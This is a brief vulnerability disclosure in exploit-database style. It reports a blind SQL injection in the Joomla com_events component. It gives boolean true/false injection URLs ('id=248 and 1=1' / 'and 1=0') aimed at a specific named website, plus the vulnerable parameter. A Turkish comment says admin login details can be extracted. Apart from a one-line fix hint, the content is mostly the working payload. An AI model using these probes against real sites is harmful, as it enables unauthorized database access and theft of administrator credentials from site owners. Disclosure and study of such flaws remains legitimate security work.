<------------------- header data start ------------------- >

#############################################################

# author : Kadir DOGAN ~ Bug Researchers

# Script Name : Joomla Component com_events Blind SQL injection Vulnerability

# Bug Type : SqL Injections

# Infection : Admin giris bilgileri alinabilir.

# Demo Vuln. :

TRUE(+)
» http://www.nwen.org/index.php?option=com_events&Itemid=15&id=248 and 1=1
FALSE(-)
» http://www.nwen.org/index.php?option=com_events&Itemid=15&id=248 and 1=0

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

?option=com_events&Itemid=15&id=[Blind SqL Inj.]

< -- bug code end of -- >